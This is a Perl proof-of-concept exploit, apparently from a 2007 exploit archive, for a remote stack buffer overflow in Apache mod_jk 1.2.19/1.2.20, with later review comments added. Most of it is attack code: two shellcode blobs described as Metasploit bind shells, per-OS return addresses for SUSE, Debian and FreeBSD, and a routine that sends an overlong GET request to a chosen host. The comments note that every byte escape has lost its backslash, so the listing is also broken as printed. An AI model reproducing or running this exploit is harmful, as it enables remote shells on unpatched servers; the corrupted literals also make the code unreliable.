# Title : Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
# Published : 2007-06-22
# Author : eliteboy
# Apache w/ mod_jk Remote Exploit
# by eliteboy
use IO::Socket;
# Proof-of-concept for a remote stack overflow in Apache mod_jk 1.2.19/1.2.20
# (per the title above). Structure: pick a target profile from @ARGV, build one
# overlong request path, send it in a single HTTP/1.0 GET, echo the reply.
#
# NOTE(review): every "\x.." byte escape and "\n" in this listing has lost its
# backslash (e.g. "xebx03", "...EXPLOIT***n"), so the string literals as shown
# are plain ASCII letters, not the byte sequences the comments below describe.
# The script is left byte-identical here; only comments are added.
#
# Defender's view: the only network traffic is one GET whose URI path is
# $alignment (4127) bytes long and consists almost entirely of repeated "A"
# characters. Overlong request URIs of that shape in the access log of a
# mod_jk-fronted host are the detection signal; the mitigation is to run a
# mod_jk release later than the two affected versions.
#
# No "use strict;"/"use warnings;" — $target, $port, $addr, $offset, $sock
# and $a are all package globals.
print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***n";
# argv[0] = hostname, argv[1] = target profile (1..3). Note the mixed
# comparisons: numeric range check here, but string "eq" against 1/2/3 below.
$target = $ARGV[1];
if (($#ARGV != 1) || ($target < 1) || ($target > 3)) {
print "Usage: modjkx.pl <hostname> <targettype>n";
print "1.tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20n"
."tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19n";
print "2.tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19n"
."tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19n";
print "3.tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19n";
exit;
}
# Destination port is hard-coded; only the host is taken from the command line.
$port = 80;
### lnx metasploit bindshell code port 2007
# Payload strings: per the author's comments these are Metasploit bind-shell
# stubs (Linux listener on 2007, BSD listener on 5555). As printed on this page
# they are letter sequences, not bytes (see the NOTE at the top).
my $lnx_shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x48x49x51x5ax6ax49".
"x58x50x30x42x31x42x41x6bx41x41x59x41x32x41x41x32".
"x42x41x30x42x41x58x50x38x41x42x75x69x79x37x41x6b".
"x6bx63x63x57x33x72x73x73x5ax76x62x32x4ax55x36x51".
"x48x4ex79x4ex69x38x61x6ax6dx4fx70x7ax36x77x33x30".
"x52x42x46x31x78x46x67x38x57x30x66x50x53x6dx59x4b".
"x51x32x4ax63x56x70x58x50x50x50x51x50x56x6fx79x4b".
"x51x7ax6dx4fx70x48x30x65x36x4bx61x4dx33x38x4dx4b".
"x30x72x72x50x52x56x36x42x63x6bx39x68x61x6ex50x33".
"x56x68x4dx6bx30x6dx43x70x6ax33x32x66x39x6cx70x37".
"x4fx58x4dx6fx70x42x69x31x69x39x69x6ex50x74x4bx46".
"x32x32x48x56x4fx46x4fx64x33x62x48x35x38x56x4fx42".
"x42x30x69x50x6ex6bx39x4ax43x56x32x73x63x4bx39x48".
"x61x68x4dx6dx50x49";
### bsd metasploit bindshell code port 5555
my $bsd_shellcode =
"xebx59x59x59x59xebx59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59xe8xa4xffxffxff".
"x49x49x49x49x49x49x49x49x37x49x49x49x49x49x49x49".
"x49x49x51x5ax6ax42x58x50x30x42x30x42x6bx42x41x52".
"x42x41x32x42x41x32x41x41x30x41x41x58x38x42x42x50".
"x75x59x79x53x5ax31x71x33x68x4dx49x50x52x32x48x76".
"x70x43x32x55x45x6fx43x6cx49x68x61x36x32x51x52x36".
"x32x62x62x52x72x50x6ax66x70x5ax6dx4fx70x4fx69x6f".
"x63x50x51x32x73x73x62x50x6ax72x48x36x38x38x4dx4f".
"x70x4cx70x51x7ax68x4dx6fx70x62x72x62x73x50x52x58".
"x30x65x4ex5ax6dx4dx50x6cx57x32x4ax66x62x31x49x41".
"x7ax41x4ax52x78x46x31x30x57x32x71x4ax6dx4dx50x77".
"x39x51x69x6cx35x30x50x32x48x66x4fx56x4fx32x53x62".
"x48x52x48x76x4fx70x62x32x49x50x6ex4dx59x5ax43x52".
"x70x72x74x56x33x70x53x6ex50x47x4bx38x4dx6bx30x42".
"A" x 100;
# Total length of the request path; the padding below is sized so that
# padding + payload + 4-byte address adds up to exactly this many bytes.
$alignment = 4127;
# Autoflush STDOUT so the echoed server reply appears immediately.
$|=1;
# Per-profile address, distinguished only by OS/distribution; the Linux
# profiles share one payload and differ only in $addr. Unmatched $target
# values are already rejected by the argv check above.
if ($target eq 1) {
$shellcode = $lnx_shellcode;
$addr = 0xbffff060;
}
if ($target eq 2) {
$shellcode = $lnx_shellcode;
$addr = 0xbfffef4c;
}
if ($target eq 3) {
$shellcode = $bsd_shellcode;
$addr = 0xbfbfe5d5;
}
# 'l' = native-endian signed 32-bit; written into the last 4 bytes of the path.
$offset = pack('l', $addr);
# No error check: on connect failure $sock is undef and the print below
# writes to an undefined handle rather than reporting the failure.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $port,
Proto => 'tcp');
# Request path = "A" padding . payload . packed address, 4127 bytes in all.
# (The "rnrn" terminator has also lost its backslashes on this page.)
$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset;
print $sock "GET /$a HTTP/1.0rnrn";
# Echo whatever the server sends back until it closes the connection.
while(<$sock>) {
print;
}